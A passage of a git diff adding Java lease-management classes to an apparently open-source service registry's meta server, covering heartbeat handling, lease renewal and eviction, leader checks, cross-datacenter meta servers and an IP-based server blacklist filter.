Nov 24, 2020 + */ +@Component +public class DefaultDataServerManager extends AbstractEvictableFilterableLeaseManager + implements DataServerManager { + + private static final Logger logger = LoggerFactory.getLogger(DefaultDataServerManager.class); + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private SlotManager slotManager; + + private final Map dataServerStatses = Maps.newConcurrentMap(); + + /** Constructor. */ + public DefaultDataServerManager() {} + + /** + * Constructor. + * + * @param metaServerConfig the meta server config + */ + public DefaultDataServerManager( + MetaServerConfig metaServerConfig, MetaLeaderService metaLeaderService) { + this.metaServerConfig = metaServerConfig; + this.metaLeaderService = metaLeaderService; + } + + /** + * Post construct. + * + * @throws Exception the exception + */ + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + /** + * Pre destory. + * + * @throws Exception the exception + */ + @PreDestroy + public void preDestory() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + public void register(Lease lease) { + super.register(lease); + notifyObservers(new NodeAdded<>(lease.getRenewal())); + } + + @Override + public boolean cancel(Lease lease) { + boolean result = super.cancel(lease); + if (result) { + notifyObservers(new NodeRemoved<>(lease.getRenewal())); + Metrics.Heartbeat.onDataEvict(lease.getRenewal().getIp()); + } + return result; + } + + @Override + public boolean renew(DataNode renewal, int leaseDuration) { + Metrics.Heartbeat.onDataHeartbeat(renewal.getIp()); + return super.renew(renewal, leaseDuration); + } + + @Override + protected int getIntervalMilli() { + return metaServerConfig.getExpireCheckIntervalMillis(); + } + + @Override + protected int getEvictBetweenMilli() { + return metaServerConfig.getExpireCheckIntervalMillis(); + } + + @VisibleForTesting + DefaultDataServerManager setMetaServerConfig(MetaServerConfig metaServerConfig) { + this.metaServerConfig = metaServerConfig; + return this; + } + + @VisibleForTesting + DefaultDataServerManager setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + return this; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "DefaultDataServerManager"; + } + + /** + * On heartbeat. + * + * @param heartbeat the heartbeat + */ + @Override + public void onHeartbeat(HeartbeatRequest heartbeat) { + String dataServer = heartbeat.getNode().getIp(); + dataServerStatses.put( + dataServer, + new DataServerStats(dataServer, heartbeat.getSlotTableEpoch(), heartbeat.getSlotStatus())); + learnFromData(heartbeat); + } + + protected void learnFromData(HeartbeatRequest heartbeat) { + if (!amILeader()) { + logger.info("data server heartbeat on follower.leader is:{}", metaLeaderService.getLeader()); + return; + } + + if (!metaLeaderService.isWarmuped()) { + logger.info("leader:{} is warming up.", metaLeaderService.getLeader()); + return; + } + + if (heartbeat.getSlotTable() == null) { + logger.info("data server:{} heartbeat slotTable is null.", heartbeat.getNode().getIp()); + return; + } + + SlotTable slotTable = heartbeat.getSlotTable(); + slotManager.refresh(slotTable); + } + + @Override + public List getDataServersStats() { + return Collections.unmodifiableList(Lists.newLinkedList(dataServerStatses.values())); + } + + @Override + public VersionedList getDataServerMetaInfo() { + VersionedList> leaseMetaInfo = getLeaseMeta(); + List dataNodes = Lists.newArrayList(); + leaseMetaInfo + .getClusterMembers() + .forEach( + lease -> { + dataNodes.add(lease.getRenewal()); + }); + return new VersionedList<>(leaseMetaInfo.getEpoch(), dataNodes); + } + + @Override + public long getEpoch() { + return currentEpoch.get(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultForbiddenServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultForbiddenServerManager.java new file mode 100644 index 000000000..9aa66902e --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultForbiddenServerManager.java @@ -0,0 +1,105 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.filter; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.alipay.sofa.registry.store.api.OperationStatus; +import com.alipay.sofa.registry.util.JsonUtils; +import com.google.common.collect.Sets; +import java.util.Set; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +@Component +public class DefaultForbiddenServerManager implements RegistryForbiddenServerManager { + + @Autowired private ProvideDataService provideDataService; + + private static final Long NOT_FOUND_VERSION = 0L; + + public DefaultForbiddenServerManager() {} + + public DefaultForbiddenServerManager(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + } + + private ForbiddenServer getForbiddenServers() { + DBResponse response = + provideDataService.queryProvideData(ValueConstants.REGISTRY_SERVER_BLACK_LIST_DATA_ID); + + if (response.getOperationStatus() == OperationStatus.SUCCESS) { + PersistenceData persistenceData = response.getEntity(); + Set servers = JsonUtils.read(persistenceData.getData(), Set.class); + return new ForbiddenServer(persistenceData.getVersion(), servers); + } + + return new ForbiddenServer(NOT_FOUND_VERSION, Sets.newHashSet()); + } + + @Override + public boolean addToBlacklist(String ip) { + ForbiddenServer servers = getForbiddenServers(); + if (servers.servers.add(ip)) { + return store(servers); + } + return false; + } + + @Override + public boolean removeFromBlacklist(String ip) { + ForbiddenServer servers = getForbiddenServers(); + if (servers.servers.remove(ip)) { + return store(servers); + } + return false; + } + + @Override + public boolean allowSelect(Lease lease) { + ForbiddenServer servers = getForbiddenServers(); + return !servers.servers.contains(lease.getRenewal().getNodeUrl().getIpAddress()); + } + + protected boolean store(ForbiddenServer servers) { + PersistenceData persistence = + PersistenceDataBuilder.createPersistenceData( + ValueConstants.REGISTRY_SERVER_BLACK_LIST_DATA_ID, + JsonUtils.writeValueAsString(servers.servers)); + + return provideDataService.saveProvideData(persistence, servers.version); + } + + class ForbiddenServer { + final long version; + final Set servers; + + public ForbiddenServer(long version, Set servers) { + this.version = version; + this.servers = servers; + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/RegistryForbiddenServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/RegistryForbiddenServerManager.java new file mode 100644 index 000000000..cb50c3f4b --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/filter/RegistryForbiddenServerManager.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.filter; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.server.meta.lease.LeaseFilter; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +public interface RegistryForbiddenServerManager extends LeaseFilter { + + boolean addToBlacklist(String ip); + + boolean removeFromBlacklist(String ip); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManager.java new file mode 100644 index 000000000..2a64d05b3 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManager.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.server.meta.lease.LeaseFilter; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +public abstract class AbstractEvictableFilterableLeaseManager + extends AbstractEvictableLeaseManager { + + @Autowired(required = false) + private List> leaseFilters; + + @Override + public VersionedList> getLeaseMeta() { + if (leaseFilters == null || leaseFilters.isEmpty()) { + return super.getLeaseMeta(); + } + VersionedList> rawVersionedList = super.getLeaseMeta(); + List> leaseList = rawVersionedList.getClusterMembers(); + for (LeaseFilter filter : leaseFilters) { + leaseList = filterOut(leaseList, filter); + } + return new VersionedList<>(rawVersionedList.getEpoch(), leaseList); + } + + protected List> filterOut(List> inputs, LeaseFilter filter) { + List> leases = Lists.newArrayListWithCapacity(inputs.size()); + for (Lease lease : inputs) { + if (filter.allowSelect(lease)) { + leases.add(lease); + } + } + return leases; + } + + @VisibleForTesting + protected AbstractEvictableFilterableLeaseManager setLeaseFilters( + List> leaseFilters) { + this.leaseFilters = leaseFilters; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableLeaseManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableLeaseManager.java new file mode 100644 index 000000000..640ea2d7b --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableLeaseManager.java @@ -0,0 +1,110 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.lease.Evictable; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Lists; +import java.util.List; +import java.util.concurrent.atomic.AtomicLong; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public abstract class AbstractEvictableLeaseManager + extends LeaderAwareLeaseManager implements Evictable { + private static final Logger EVICT_LOG = LoggerFactory.getLogger("EVICT"); + + private final AtomicLong lastEvictTime = new AtomicLong(); + + private final EvictTask evictTask = new EvictTask(); + + @Override + public void doInitialize() throws InitializeException { + super.doInitialize(); + ConcurrentUtils.createDaemonThread(getClass().getSimpleName(), evictTask).start(); + } + + @Override + public void doDispose() throws DisposeException { + evictTask.close(); + super.doDispose(); + } + + @Override + public void evict() { + if (lastEvictTime.get() + getEvictBetweenMilli() > System.currentTimeMillis()) { + logger.warn("[evict][too quick] last evict time: {}", lastEvictTime.get()); + return; + } + lastEvictTime.set(System.currentTimeMillis()); + List> expirations = getExpiredLeases(); + if (expirations.isEmpty()) { + return; + } + + for (Lease lease : expirations) { + Lease doubleCheck = getLease(lease.getRenewal()); + if (doubleCheck.isExpired()) { + EVICT_LOG.info("[evict]{},{}", doubleCheck.getRenewal().getNodeType(), doubleCheck); + try { + cancel(lease); + } catch (Throwable th) { + logger.error("[evict] node cancel failure", th); + } + } + } + } + + protected List> getExpiredLeases() { + List> expires = Lists.newLinkedList(); + for (Lease lease : getLeaseMeta().getClusterMembers()) { + if (lease.isExpired()) { + expires.add(lease); + } + } + return expires; + } + + protected abstract int getEvictBetweenMilli(); + + protected abstract int getIntervalMilli(); + + private final class EvictTask extends WakeUpLoopRunnable { + + @Override + public int getWaitingMillis() { + return getIntervalMilli(); + } + + @Override + public void runUnthrowable() { + if (amILeader() && metaLeaderService.amIStableAsLeader()) { + logger.info("[evict] begin"); + evict(); + } + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/DefaultCrossDcMetaServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/DefaultCrossDcMetaServerManager.java new file mode 100644 index 000000000..a9e7a504f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/DefaultCrossDcMetaServerManager.java @@ -0,0 +1,212 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import static com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfiguration.GLOBAL_EXECUTOR; +import static com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfiguration.SHARED_SCHEDULE_EXECUTOR; + +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.impl.AbstractLifecycle; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServer; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.impl.DefaultCrossDcMetaServer; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; +import java.util.Collection; +import java.util.Map; +import java.util.concurrent.ConcurrentMap; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.ScheduledExecutorService; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import javax.annotation.Resource; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +/** + * Unique entrance for all "Cross-Dc-MetaServer" instances As while as a LeaderAware object, which + * watches leader event and trigger cross-dc-metaservers' refresh job when leader term and stop all + * of them when it's not a raft-cluster leader + */ +@Component +// @Profile(value = "cloud") +public class DefaultCrossDcMetaServerManager extends AbstractLifecycle + implements CrossDcMetaServerManager { + + /** Map[DataCenter(String), CrossDcMetaServer] */ + private ConcurrentMap crossDcMetaServers = Maps.newConcurrentMap(); + + @Autowired private NodeConfig nodeConfig; + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private MetaLeaderService metaLeaderService; + + @Resource(name = SHARED_SCHEDULE_EXECUTOR) + private ScheduledExecutorService scheduled; + + @Resource(name = GLOBAL_EXECUTOR) + private ExecutorService executors; + + @Autowired private Exchange boltExchange; + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + } + + @PreDestroy + public void preDestory() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + public CrossDcMetaServer getOrCreate(String dcName) { + CrossDcMetaServer metaServer = crossDcMetaServers.get(dcName); + if (metaServer == null) { + synchronized (this) { + metaServer = crossDcMetaServers.get(dcName); + if (metaServer == null) { + metaServer = + new DefaultCrossDcMetaServer( + dcName, + nodeConfig.getDataCenterMetaServers(dcName), + scheduled, + boltExchange, + metaLeaderService, + metaServerConfig); + try { + LifecycleHelper.initializeIfPossible(metaServer); + } catch (Throwable e) { + logger.error( + "[getOrCreate][{}]Cross-Dc-MetaServer create err, stop register to map", dcName, e); + throw new SofaRegistryRuntimeException(e); + } + crossDcMetaServers.put(dcName, metaServer); + } + } + } + return metaServer; + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + for (Map.Entry> entry : nodeConfig.getMetaNodeIP().entrySet()) { + if (entry.getKey().equalsIgnoreCase(nodeConfig.getLocalDataCenter())) { + continue; + } + getOrCreate(entry.getKey()); + } + } + + @Override + protected void doStart() throws StartException { + super.doStart(); + new ConcurrentUtils.SafeParaLoop(executors, crossDcMetaServers.values()) { + @Override + protected void doRun0(CrossDcMetaServer metaServer) throws Exception { + LifecycleHelper.startIfPossible(metaServer); + } + }.run(); + } + + @Override + protected void doStop() throws StopException { + new ConcurrentUtils.SafeParaLoop(executors, crossDcMetaServers.values()) { + @Override + protected void doRun0(CrossDcMetaServer metaServer) throws Exception { + LifecycleHelper.stopIfPossible(metaServer); + } + }.run(); + super.doStop(); + } + + @Override + protected void doDispose() throws DisposeException { + this.crossDcMetaServers = Maps.newConcurrentMap(); + super.doDispose(); + } + + @VisibleForTesting + DefaultCrossDcMetaServerManager setNodeConfig(NodeConfig nodeConfig) { + this.nodeConfig = nodeConfig; + return this; + } + + @VisibleForTesting + DefaultCrossDcMetaServerManager setMetaServerConfig(MetaServerConfig metaServerConfig) { + this.metaServerConfig = metaServerConfig; + return this; + } + + @VisibleForTesting + DefaultCrossDcMetaServerManager setScheduled(ScheduledExecutorService scheduled) { + this.scheduled = scheduled; + return this; + } + + @VisibleForTesting + DefaultCrossDcMetaServerManager setExecutors(ExecutorService executors) { + this.executors = executors; + return this; + } + + @VisibleForTesting + DefaultCrossDcMetaServerManager setExchange(Exchange boltExchange) { + this.boltExchange = boltExchange; + return this; + } + + @VisibleForTesting + ConcurrentMap getCrossDcMetaServers() { + return crossDcMetaServers; + } + + @Override + public void becomeLeader() { + try { + LifecycleHelper.startIfPossible(this); + } catch (Throwable th) { + logger.error("[becomeLeader]", th); + } + } + + @Override + public void loseLeader() { + try { + LifecycleHelper.stopIfPossible(this); + } catch (Throwable th) { + logger.error("[loseLeader]", th); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManager.java new file mode 100644 index 000000000..e4432cd11 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManager.java @@ -0,0 +1,81 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.exception.SofaRegistryMetaLeaderException; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public class LeaderAwareLeaseManager extends SimpleLeaseManager { + + @Autowired protected MetaLeaderService metaLeaderService; + + /** + * Register. + * + * @param lease the lease + */ + @Override + public void register(Lease lease) { + if (!amILeader()) { + throw new SofaRegistryMetaLeaderException( + metaLeaderService.getLeader(), metaLeaderService.getLeaderEpoch(), "leader mismatch"); + } + super.register(lease); + } + + /** + * Cancel boolean. + * + * @param lease the lease + * @return the boolean + */ + @Override + public boolean cancel(Lease lease) { + if (!amILeader()) { + throw new SofaRegistryMetaLeaderException( + metaLeaderService.getLeader(), metaLeaderService.getLeaderEpoch(), "leader mismatch"); + } + return super.cancel(lease); + } + + /** + * Renew boolean. + * + * @param renewal the renewal + * @param leaseDuration the lease duration + * @return the boolean + */ + @Override + public boolean renew(T renewal, int leaseDuration) { + if (!amILeader()) { + throw new SofaRegistryMetaLeaderException( + metaLeaderService.getLeader(), metaLeaderService.getLeaderEpoch(), "leader mismatch"); + } + return super.renew(renewal, leaseDuration); + } + + protected boolean amILeader() { + return metaLeaderService.amILeader(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManager.java new file mode 100644 index 000000000..e65a5cc72 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManager.java @@ -0,0 +1,160 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.impl.AbstractLifecycleObservable; +import com.alipay.sofa.registry.server.meta.lease.LeaseManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.concurrent.ConcurrentMap; +import java.util.concurrent.atomic.AtomicLong; +import java.util.concurrent.locks.ReentrantReadWriteLock; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public class SimpleLeaseManager extends AbstractLifecycleObservable + implements LeaseManager { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected final AtomicLong currentEpoch = new AtomicLong(); + // Map[ip-address, Lease{node, duration, timestamp}] + protected final ConcurrentMap> localRepo = Maps.newConcurrentMap(); + + protected final ReentrantReadWriteLock lock = new ReentrantReadWriteLock(); + + protected void register(Lease lease) { + if (lease == null) { + throw new IllegalArgumentException("[register]NullPointer of lease"); + } + logger.info("[register] register node: {}", lease.getRenewal()); + + lock.writeLock().lock(); + try { + String nodeIp = lease.getRenewal().getNodeUrl().getIpAddress(); + localRepo.putIfAbsent(nodeIp, lease); + refreshEpoch(DatumVersionUtil.nextId()); + } finally { + lock.writeLock().unlock(); + } + } + + protected boolean cancel(Lease lease) { + if (lease == null) { + throw new IllegalArgumentException("[cancel]NullPointer of renewal"); + } + // read lock for concurrent modification, and mutext for renew/register operations + lock.writeLock().lock(); + boolean result = true; + try { + logger.info("[cancel][begin] {}", lease); + result = localRepo.remove(lease.getRenewal().getNodeUrl().getIpAddress(), lease); + logger.info("[cancel][end] {}", result); + refreshEpoch(DatumVersionUtil.nextId()); + } finally { + lock.writeLock().unlock(); + } + return result; + } + + @Override + public boolean renew(T renewal, int leaseDuration) { + if (renewal == null) { + throw new IllegalArgumentException("[renew]NullPointer of renewal"); + } + int validLeaseDuration = leaseDuration > 0 ? leaseDuration : Lease.DEFAULT_DURATION_SECS; + + lock.writeLock().lock(); + try { + Lease lease = localRepo.get(renewal.getNodeUrl().getIpAddress()); + if (lease == null) { + logger.warn( + "[renew][node not exist, register: {}-{}]", + renewal.getNodeType(), + renewal.getNodeUrl().getIpAddress()); + + register(new Lease<>(renewal, validLeaseDuration)); + return false; + } + logger.info( + "[renew][renew lease] node: {}-{}, extends: {}s", + renewal.getNodeType(), + renewal.getNodeUrl().getIpAddress(), + validLeaseDuration); + + lease.renew(validLeaseDuration); + } finally { + lock.writeLock().unlock(); + } + return true; + } + + @Override + public Lease getLease(T renewal) { + return localRepo.get(renewal.getNodeUrl().getIpAddress()); + } + + @Override + public VersionedList> getLeaseMeta() { + lock.readLock().lock(); + try { + return new VersionedList<>(getEpoch(), getClusterMembers()); + } finally { + lock.readLock().unlock(); + } + } + + @VisibleForTesting + protected boolean refreshEpoch(long newEpoch) { + if (currentEpoch.get() < newEpoch) { + logger.info("[refreshEpoch] epoch change from {} to {}", currentEpoch.get(), newEpoch); + currentEpoch.set(newEpoch); + return true; + } else { + logger.info( + "[refreshEpoch] epoch change not able, current {}, request {}", + currentEpoch.get(), + newEpoch); + return false; + } + } + + private long getEpoch() { + return currentEpoch.get(); + } + + private List> getClusterMembers() { + List> result = Lists.newArrayList(); + try { + lock.readLock().lock(); + result.addAll(localRepo.values()); + return result; + } finally { + lock.readLock().unlock(); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManager.java new file mode 100644 index 000000000..0bb25a1a3 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManager.java @@ -0,0 +1,158 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.session; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeAdded; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeModified; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeRemoved; +import com.alipay.sofa.registry.server.meta.lease.impl.AbstractEvictableFilterableLeaseManager; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.collect.Lists; +import java.util.List; +import java.util.Objects; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

